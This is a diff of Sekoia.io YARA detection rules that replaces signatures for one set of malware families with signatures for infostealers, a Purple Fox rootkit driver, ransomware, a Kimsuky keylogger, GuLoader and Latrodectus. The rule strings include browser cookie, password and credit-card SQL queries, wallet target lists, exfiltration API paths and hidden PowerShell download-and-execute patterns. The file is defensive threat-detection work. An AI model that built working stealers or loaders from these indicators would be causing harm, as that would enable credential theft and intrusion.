+rule SEKOIA_Apt_Badmagic_Startngrok_Pshscript : FILE
 {
 	meta:
-		description = "Jennlog loader used to deliver the Apostle ransomware"
+		description = "Detects BadMagic StartNgrok powershell script"
 		author = "Sekoia.io"
-		id = "a69088e5-207f-494f-876b-766b8050e8c2"
-		date = "2021-10-04"
+		id = "94d64482-3033-4531-8530-58546364ac06"
+		date = "2023-05-15"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_jennlog.yar#L4-L24"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_startngrok_pshscript.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0ffcd1f35570b28a1bd6f9a0361f8f921942f7345dcb2896fc092bb92f7d4d6d"
+		logic_hash = "f15f9dc2c35f3f7cd816aa539c03b857254c3628c9b14eacca1110bb85b1a24c"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "$ExecutablePath http \"\"file:///$Disk"
+		$ = "write \"$ExecutablePath not found"
+		$ = "$ng_proxy_string ="
+		$ = "$ng_auth_token ="
+		$ = "$env:ALLUSERSPROFILE\\$NGrokFolderName"
+
 	condition:
-		pe.timestamp== 3140259112 or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4c4577276ff0323d9aedcc39ecf2c964" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "8476a7fca587f1e5d3ae076293b9fbcccbebc4bd4f7b783228ad5da39305a3d9" )
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Apt_Gamaredon_Getlogicaldrive_Hunting : FILE
+rule SEKOIA_Infostealer_Win_Spacestealer : FILE
 {
 	meta:
-		description = "Detects gamaredon powershell stuff"
+		description = "Detects SpaceStealer based on specific strings"
 		author = "Sekoia.io"
-		id = "18958ee8-7eb8-43b5-8ad2-be93bb39aa80"
-		date = "2023-02-08"
+		id = "aceae3b3-1f5a-48b4-84cb-d0ba68d26df5"
+		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_getlogicaldrive_hunting.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_spacestealer.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4ec19e4d5723bc33d6f11598ce538403678e906bc416b58fea6e1b10cd26e5b6"
-		score = 50
-		quality = 60
+		logic_hash = "94edfd0606816ff01d1345357a852cab4321d8881921e51ba96d8d2d4cb893b5"
+		score = 75
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "VolumeSerialNumber" ascii wide nocase
-		$ = "Get-WmiObject" ascii wide nocase
-		$ = "]::ToUInt32(" ascii wide nocase
-		$ = "DeviceID" ascii wide nocase
-		$ = "UploadValues" ascii wide nocase
-		$ = "UploadString" ascii wide nocase
+		$str01 = "spacestealerxD" ascii
+		$str02 = "\\spacex" ascii
+		$str03 = "@~$~@spacex-" ascii
+		$str04 = "StealerClient" ascii
+		$str05 = "kill-process-by-name" ascii
+		$str06 = "\\BetterDiscord\\data\\betterdiscord.asar" ascii
+		$str07 = "api/webhooks" ascii
+		$str08 = "discordPath" ascii
+		$str09 = "SELECT host_key, name, encrypted_value FROM cookies" ascii
+		$str10 = "SELECT origin_url, username_value, password_value FROM logins" ascii
+		$str11 = "SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards" ascii
+		$str12 = "Cookies don't found." ascii
+		$str13 = "/api/cookies?auth=" ascii
+		$str14 = "/api/passwords?auth=" ascii
+		$str15 = "/api/autofill?auth=" ascii
+		$str16 = "/api/creditcards?auth=" ascii
+		$str17 = "\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\" ascii
 
 	condition:
-		5 of them and filesize < 500KB
+		uint16( 0 ) == 0x5A4D and filesize > 10MB and 13 of them
 }
 
-rule SEKOIA_Implant_Win_Apt29_2022_10
+rule SEKOIA_Rootkit_Win_Purplefox_Kernel_Driver : FILE
 {
 	meta:
-		description = "APT29 implants from October 2022"
+		description = "Detect the Purple Fox trojan"
 		author = "Sekoia.io"
-		id = "0f270e75-f687-4fdc-a980-fde81107a4d6"
-		date = "2023-02-15"
+		id = "798dc20b-76cd-4e31-b9ee-f363fb39cd58"
+		date = "2022-03-28"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_apt29_2022_10.yar#L4-L20"
+		reference = "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_win_purplefox_kernel_driver.yar#L3-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b9300c2f06b54b16e1cab579d686d986caacf3b6eccec3a4e62d58e94b50bfb4"
+		logic_hash = "91d7caca7c0c41e70813d52b5662bf0238d078fca519bfc2c03f3f87fe3805b8"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "1cffaf3be725d1514c87c328ca578d5df1a86ea3b488e9586f9db89d992da5c4"
-		hash2 = "381a3c6c7e119f58dfde6f03a9890353a20badfa1bfa7c38ede62c6b0692103c"
+
+	strings:
+		$ = "\\DosDevices\\Global\\MyDriver" wide
+		$ = "IOCTL_IO_KILL_PROCESS" ascii
+		$ = "IOCTL_IO_DELET_FILE" ascii
+		$ = "IOCTL_IO_COPY_FILE" ascii
+		$ = "IOCTL_IO_KILL_MINIFITER" ascii
 
 	condition:
-		pe.imphash( ) == "39b818e7bac0a276f509f8c47e467666" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6621113d9f212c71b8dd3ce85c62b251" )
+		uint16( 0 ) == 0x5A4D and all of them or ( pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 158 , 30319 ) and pe.rich_signature.toolid ( 170 , 30319 ) and pe.rich_signature.toolid ( 147 , 30729 ) and pe.rich_signature.toolid ( 1 , 0 ) ) and for any i in ( 0 .. pe.number_of_signatures -1 ) : ( pe.signatures [ i ] . thumbprint == "c7939f8303ca22effb28246e970b13bee6cb8043" )
 }
-rule SEKOIA_Loader_Win_Erbium : FILE
+rule SEKOIA_Infostealer_Win_Xfiles : FILE
 {
 	meta:
-		description = "Detect the Erbium loader based on specific user-agent and URI"
+		description = "Detect the X-FILES infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "d1e5be62-5677-4ef4-9f10-65baf36ab619"
-		date = "2022-09-30"
+		id = "3ad3ee19-6be8-484b-943c-05813cdcbd18"
+		date = "2022-02-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_erbium.yar#L1-L19"
+		reference = "https://twitter.com/3xp0rtblog/status/1375206169384521730"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_xfiles.yar#L1-L50"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e93e9dbf0e5412afa4640b4cf5d94374c4df38f8044d44c375e86508c0d4190a"
+		logic_hash = "404ee02fa1905f49c3c3ca525cfb3c5ba1d2ec46554239035c1891d21f547a2c"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36" wide
-		$str02 = "cloud/getHost.php?method=getstub&bid=" wide
-		$str03 = "api.php?method=getstub&bid=" wide
-		$api = "WinHttp" ascii
+		$xfi0 = "Telegram bot - @XFILESShop_Bot" wide
+		$xfi1 = "Telegram support - @XFILES_Seller" wide
+		$brw0 = "\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" wide
+		$brw1 = "\\Chromium\\User Data\\Default\\Cookies" wide
+		$brw2 = "\\Slimjet\\User Data\\Default\\Cookies" wide
+		$brw3 = "\\Vivaldi\\User Data\\Default\\Cookies" wide
+		$brw4 = "\\Opera Software\\Opera GX Stable\\Cookies" wide
+		$brw5 = "\\Opera Software\\Opera Stable\\Cookies" wide
+		$crp00 = "Tronlink" wide
+		$crp01 = "NiftyWallet" wide
+		$crp02 = "MetaMask" wide
+		$crp03 = "MathWallet" wide
+		$crp04 = "Coinbase" wide
+		$crp05 = "BinanceChain" wide
+		$crp06 = "GuardaWallet" wide
+		$crp07 = "EqualWallet" wide
+		$crp08 = "BitAppWallet" wide
+		$crp09 = "iWallet" wide
+		$crp10 = "Wombat" wide
+		$crp11 = "Zcash" wide
+		$crp12 = "Armory" wide
+		$crp13 = "Bytecoin" wide
+		$crp14 = "Jaxx" wide
+		$crp15 = "Exodus" wide
+		$crp16 = "Ethereum" wide
+		$crp17 = "AtomicWallet" wide
+		$crp18 = "Guarda" wide
+		$crp19 = "Coinomi" wide
+		$crp20 = "Litecoin" wide
+		$crp21 = "Dash" wide
+		$crp22 = "Bitcoin" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and #api > 6
+		uint16( 0 ) == 0x5A4D and any of ( $xfi* ) or 5 of ( $brw* ) and 20 of ( $crp* )
 }
-
-rule SEKOIA_Backdoor_Win_Minibus : FILE
+rule SEKOIA_Backdoor_Opensource_Northstar_Strings : FILE
 {
 	meta:
-		description = "Detect the MINIBUS backdoor used by UNC1549 since August 2023"
+		description = "Detects the NorthStar Backdoor strings"
 		author = "Sekoia.io"
-		id = "f88bcf15-9a9f-4d84-adc6-db1db55fe93c"
-		date = "2024-02-29"
+		id = "6bf2f428-ec1a-4115-9c5e-258e9176969a"
+		date = "2022-08-23"
 		modified = "2024-12-19"
-		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_minibus.yar#L4-L41"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_opensource_northstar_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "57dabcc15c84c4497b3561f19a7e464fb0dfe93576f4caea88c7cd8534cb4bfd"
+		logic_hash = "c4cf8935137c1420106807240de7583ca8f5c0b231f51bba279aedf672e25274"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243021,27 +242856,28 @@ rule SEKOIA_Backdoor_Win_Minibus : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dll_150_1 = "TorvaldsPersist.dll"
-		$dll_150_2 = "FileCoAuth.exe"
-		$dll_50_1 = "TorvaldInitial.dll"
-		$dll_50_2 = "\\essential.dat"
+		$ = "_SAMDUMP.zip" wide
+		$ = "northstar" wide
+		$ = "smanage.php?sid=" wide
+		$ = "File Not Exists" wide
+		$ = "<enablecmd or enable cmd>" wide
+		$ = "getjuice.php" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and all of ( $dll_150_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "2cf9797b1cfb5795d0fb892b7c371d506a5dd8b7c64fdc82975b3fde6d997df0" ) ) or ( uint16( 0 ) == 0x5A4D and all of ( $dll_50_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" ) )
+		uint16be( 0 ) == 0x4d5a and 6 of them
 }
-rule SEKOIA_Win_Loader_Astasialoader_Strings : FILE
+rule SEKOIA_Ransomware_Win_Scransom : FILE
 {
 	meta:
-		description = "AstasiaLoader strings"
+		description = "Finds ScRansom samples based on specific strings"
 		author = "Sekoia.io"
-		id = "8dfabf28-4b5a-43db-87e9-5b9080541ec3"
-		date = "2023-08-16"
+		id = "ea799295-1332-49c6-9816-035b91fc9b4f"
+		date = "2023-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_loader_astasialoader_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_scransom.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "44b6f7508a82ff6a4d65defc189303eeee393b5fd498de73d74d0a2c75c87401"
-		logic_hash = "02a7bed506865d761ec03b8de4b7fc636b71f48c62e933013f2ffa23deabb62e"
+		logic_hash = "3b8034bc5e0919d6c05dd2f2079c40836f241f2db02c1baf70ecb530db90847f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243049,30 +242885,42 @@ rule SEKOIA_Win_Loader_Astasialoader_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "newuploaders" wide
-		$s2 = "\\infected.exe" wide
-		$s3 = "AstasiaLoader" wide
-		$s4 = "Astasia.pdb" ascii
-		$s5 = "ip-api.com/line/?fields=hosting" wide
-		$s6 = "https://api.telegram.org/bot" wide
-		$s7 = "currentscript.txt" wide
-		$s8 = "sessionlog.txt" wide
+		$str01 = "TIMATOMAFULL" wide
+		$str02 = ".Encrypted" wide
+		$str03 = ".Encrypting" wide
+		$str04 = "File Name :" wide
+		$str05 = "File size :" wide
+		$str06 = "TIMATOMA#" wide
+		$str07 = "Already Encrypted" wide
+		$str08 = "HOW TO RECOVERY FILES.TXT" wide
+		$str09 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" wide
+		$str10 = "Search cancelled -" wide
+		$str11 = "note.txt" wide
+		$str12 = "Cannot sort the list while a search is in progress." wide
+		$str13 = "Cancelling search, please wait..." wide
+		$str14 = "Error showing process list" wide
+		$str15 = "[System Process]" wide
+		$str16 = "taskkill /f /im" wide
+		$str17 = "kill.bat" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 1MB and 5 of them
+		uint16( 0 ) == 0x5a4d and 15 of them
 }
-rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022_2 : FILE
+rule SEKOIA_Apt_Kimsuky_Klogexe : FILE
 {
 	meta:
-		description = "Detects Saitama backdoor variants"
+		description = "Detects KLogExe, a keylogger used by Kimsuky"
 		author = "Sekoia.io"
-		id = "f885551a-d0f0-431d-aa4f-7caa93b1db6a"
-		date = "2022-05-13"
+		id = "f6e3b1a5-43b6-4dac-83c2-a365c41de38d"
+		date = "2024-09-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_saitama_backdoor_may2022_2.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_klogexe.yar#L1-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "622c386d4b10b81a5c84f9c093d91add04497a707ba88e8395fda8587b5c3791"
+		hash = "e1d683ee1746c08c5fff1c4c2b3b02f0"
+		hash = "90946c6358eacd119fe1eb36ec7a0a18"
+		hash = "9760f489a390665b5e7854429b550c83"
+		logic_hash = "4b616908ceacd85c5d8b527cd1a718082c709071dc1fa9c9ccc96e71dc4e7449"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243080,27 +242928,32 @@ rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "_CorExeMain"
-		$ = "GetAgentID"
-		$ = "ComputeStringHash"
-		$ = ".Agent.pdb"
-		$ = "TaskExecTimeout"
+		$event = "Norton_BreakHelper" ascii wide
+		$log = "------ %d/%d/%d : %d/%d ------" ascii wide
+		$keylog_1 = "[RM+]"
+		$keylog_2 = "[Tab+]"
+		$keylog_3 = "[Home+]"
+		$keylog_4 = "[End+]"
+		$keylog_5 = "[clip_s]: %s "
+		$keylog_6 = "%s[Too many clip_tail]"
+		$keylog_7 = "%s[F%d]"
+		$user_agent = "Chrome/31.0." wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 600KB and 8 of them
 }
-rule SEKOIA_Apt_Kimsuky_Sharptongue_Vbslauncher_Strings : FILE
+rule SEKOIA_Guloader_Powershell_1 : FILE
 {
 	meta:
-		description = "Detects VBS Launchers used by SharpTongue"
+		description = "Powershell downloading decoy and delivering GuLoader"
 		author = "Sekoia.io"
-		id = "82bd648c-2961-4945-950e-8fb1e4650338"
-		date = "2022-07-29"
+		id = "28c68991-db8b-4f00-b3a3-17286418a4ed"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharptongue_vbslauncher_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_powershell_1.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9e1383a71b4ab5ca1de5016061f0e9c83e6f3e1a41eef25dae15cd1aab8b581f"
+		logic_hash = "9fd2d0e31f939e7e96444eaa4802c9c33407c5fb77067670d8ce2d3796199961"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243108,57 +242961,51 @@ rule SEKOIA_Apt_Kimsuky_Sharptongue_Vbslauncher_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "powershell" ascii wide
-		$ = "On Error Resume Next" ascii wide
-		$ = "oShell.run(tmp0,0" ascii wide
+		$s1 = "powershell -win hidden"
+		$s2 = "=iex($"
+		$s3 = ".Replace('"
+		$s4 = "$(Get-ChildItem -Include *.lnk -Name));"
 
 	condition:
-		all of them and filesize < 10KB
+		all of them and filesize < 10KB and #s3 > 3
 }
-rule SEKOIA_Backdoor_Win_Sponsor : FILE
+rule SEKOIA_Apt_Kimsuky_Validator_Strings : FILE
 {
 	meta:
-		description = "Detect the Sponsor backdoor"
+		description = "Detects Kimsuky validator"
 		author = "Sekoia.io"
-		id = "d410cdb7-a2a8-481e-a90a-49ef15a7a0e3"
-		date = "2024-03-29"
+		id = "e055f2d4-8318-4342-812e-0f621d7886b4"
+		date = "2024-06-11"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/en/eset-research/sponsor-batch-filed-whiskers-ballistic-bobcats-scan-strike-backdoor/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_sponsor.yar#L1-L24"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_validator_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "844104863e8e0c49da3a41d39fe210e01329eeaecec6ffc231aae12392773ef6"
+		logic_hash = "a627dae8c12f0f6f8472bc12b8e1a85137f92f6e389f817ab9023c90720a42b0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e5ee874bd59bb2a6dec700686544e7914312abff166a7390b34f7cb29993267a"
-		hash2 = "e2b74ed355d68bed2e7242baecccd7eb6eb480212d6cc54526bc4ff7e6f57629"
-		hash3 = "2a99cf7d73d453f3554e24bf3efa49d8109da9e8543db815a8f813559d083f8f"
-		hash4 = "c4dbda41c726af9ba3d9224f2e38fc433d2b60f4a23512437adeae8ef8986c57"
 
 	strings:
-		$ = "Content-Type: application/x-www-form-urlencoded"
-		$ = "SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation"
-		$ = "\\Uninstall.bat"
-		$ = "\\config.txt"
-		$ = "\\node.txt"
+		$ = "%s%sc %s >%s 2>&1" wide
+		$ = "%s%sc %s 2>%s" wide
 
 	condition:
 		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Infostealer_Win_Edgeguard : FILE
+rule SEKOIA_Loader_Win_Red0044_Powershell_May24 : FILE
 {
 	meta:
-		description = "Finds EdgeGuard Stealer samples based on specific strings"
+		description = "Finds PowerShell scripts used in a malvertising campaign to deliver NetSupport RAT"
 		author = "Sekoia.io"
-		id = "bbdb362f-d235-48f8-8fa5-d340d4e3e3f0"
-		date = "2023-08-22"
+		id = "ba3454b4-31cf-458d-8d78-c5cc5fa348ff"
+		date = "2024-05-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_edgeguard.yar#L1-L32"
+		reference = "https://twitter.com/crep1x/status/1786150734121120075"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_red0044_powershell_may24.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "11396aea2e166456ec8311f95a8037aac41f69caf3158f8c19cb0c38327842d6"
+		logic_hash = "73939f65b93b320b9e220ee284ea524864a6b05c7608213009ac5f00b3faeedc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243166,40 +243013,33 @@ rule SEKOIA_Infostealer_Win_Edgeguard : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "main.downloadnecessary" ascii
-		$str02 = "main.extractchromepasswords" ascii
-		$str03 = "main.extracttasksch" ascii
-		$str04 = "main.BrowserDownloadsViewExtract" ascii
-		$str05 = "main.stealmetamask" ascii
-		$str06 = "main.stealexoduswallet" ascii
-		$str07 = "main.moveatomic" ascii
-		$str08 = "main.movefirefoxcookies" ascii
-		$str09 = "main.movepasswords" ascii
-		$str10 = "main.FinallyZIPIPFolder" ascii
-		$str11 = "edgeguard.business" ascii
-		$str12 = "/License.XenArmor" ascii
-		$str13 = "/TaskSchedulerView.exe" ascii
-		$str14 = "/BrowsingHistoryView.exe" ascii
-		$str15 = "/outlookfiles/starter.exe" ascii
-		$str16 = "/outlookfiles/External.zip" ascii
-		$str17 = "/outlookfiles/XenManager.dll" ascii
-		$str18 = "/outlookfiles/EmailPasswordRecoveryPro.exe" ascii
+		$str01 = "Start-Job -ScriptBlock" ascii
+		$str02 = "Get-WmiObject" ascii
+		$str03 = "-Class Win32_OperatingSystem" ascii
+		$str04 = "-Class AntiVirusProduct" ascii
+		$str05 = "$_.Exception.Message" ascii
+		$str06 = ".DownloadString" ascii
+		$str07 = "New-Object Net.WebClient" ascii
+		$str08 = "myUserAgentHere" ascii
+		$str09 = "GetFolderPath('Desktop'))\\document.pdf" ascii
+		$str10 = "Receive-Job -Job" ascii
+		$str11 = "Start-Process" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 10 of ( $str* )
+		8 of them and filesize < 20KB
 }
-rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment_Stage2 : FILE
+rule SEKOIA_Tool_Petitpotato : FILE
 {
 	meta:
-		description = "Detects Gamaredon HTMLSmuggling attachment"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "e82335ea-48d5-409c-a270-cfd5a2197c44"
-		date = "2023-01-20"
+		id = "72808202-a124-478e-bc60-59d35824b948"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_htmlsmuggling_attachment_stage2.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_petitpotato.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "42e637f628db6719342ae104c6c89bb80609c5f3f5c2586daccb31f7d688a2a1"
+		logic_hash = "93a46c7765ad9f18c2176b98c91edf97827707ffdefcedc40078c87c30343508"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243207,27 +243047,26 @@ rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment_Stage2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ") == -1) die();" ascii
-		$ = "'data:application/x-rar-compressed;base64, ' +" ascii
-		$ = ".appendChild(img);" ascii
-		$ = "['Win32', 'Win64', 'Windows', 'WinCE'].indexOf(" ascii
-		$ = " = navigator[\"platform\"];" ascii
+		$s2 = "set_FileName" ascii wide
+		$s3 = "VarFileInfo" ascii wide
+		$s4 = "PetitPotato.exe" ascii wide
+		$s5 = "0.0.0.0" ascii wide
 
 	condition:
-		4 of them and filesize < 1MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Ransomware_Win_Fonix : FILE
+rule SEKOIA_Loader_Latrodectus_Dll : FILE
 {
 	meta:
-		description = "Detect the Fonix / XINOF ransomware by spotting its specific debug path"
+		description = "Finds Latrodectus samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "b28467d5-69a0-4a8b-8938-8fdac2ae8d19"
-		date = "2021-10-07"
+		id = "c60676ad-31cb-4f4d-9073-757a0ad7d23d"
+		date = "2023-12-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_fonix.yar#L1-L16"
+		reference = "https://twitter.com/Myrtus0x0/status/1732997981866209550"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_latrodectus_dll.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2085fae62c07f63723a417566c204b0a9942de35ed80272d1486dc2c96ca0037"
+		logic_hash = "57aae1944eded14537cdc1c17b21cfc503687a416551b782fc76f8c7858e936e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243235,24 +243074,42 @@ rule SEKOIA_Ransomware_Win_Fonix : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Ransomware\\Fonix" ascii
-		$s2 = "Release\\Fonix.pdb" ascii
+		$str01 = "c:\\temp\\debug.pdb" fullword ascii
+		$str02 = "Bottmp64.dll" fullword ascii
+		$str03 = "scab" fullword ascii
+		$str04 = "&wmic=" fullword ascii
+		$str05 = "&ipconfig=" fullword ascii
+		$str06 = "&systeminfo=" fullword ascii
+		$str07 = "&domain_trusts=" fullword ascii
+		$str08 = "&domain_trusts_all=" fullword ascii
+		$str09 = "&net_view_all_domain=" fullword ascii
+		$str10 = "&net_view_all=" fullword ascii
+		$str11 = "&net_group=" fullword ascii
+		$str12 = "&net_config_ws=" fullword ascii
+		$str13 = "&net_wmic_av=" fullword ascii
+		$str14 = "&whoami_group=" fullword ascii
